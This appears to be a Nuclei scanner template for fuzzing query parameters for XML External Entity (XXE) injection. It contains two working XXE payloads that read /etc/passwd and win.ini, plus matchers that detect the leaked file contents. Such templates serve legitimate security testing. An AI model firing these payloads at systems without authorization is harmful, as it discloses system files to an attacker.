id: fuzz-xxe

info:
  name: XXE Fuzzing
  author: pwnhxl,otterly
  severity: medium
  reference:
    - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
  tags: dast,xxe

variables:
  rletter: "{{rand_base(6,'oterly')}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      xxe:
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{xxe}}"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        name: linux
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'

      - type: word
        name: windows
        part: body
        words:
          - 'for 16-bit app support'